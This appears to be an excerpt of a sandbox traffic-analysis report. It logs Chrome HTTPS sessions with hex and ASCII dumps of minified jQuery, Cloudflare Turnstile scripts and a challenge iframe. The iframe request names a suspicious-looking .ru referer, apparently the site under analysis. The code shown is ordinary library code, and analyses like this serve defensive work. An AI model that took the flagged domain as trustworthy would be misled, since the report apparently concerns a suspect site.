                                                                                                                                                                                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            120192.168.2.1749839104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 47521
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                                            last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6abca038cc0-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                                                                                                                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                                                                                                                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                                                                                                                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                                                                                                                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            121192.168.2.1749840104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 26635
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                            cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            origin-agent-cluster: ?1
                                                                                                                                                                                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                            referrer-policy: same-origin
                                                                                                                                                                                                                                            document-policy: js-profiling
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 61 62 64 61 62 33 37 64 30 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Server: cloudflareCF-RAY: 8ffcb6abdab37d06-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
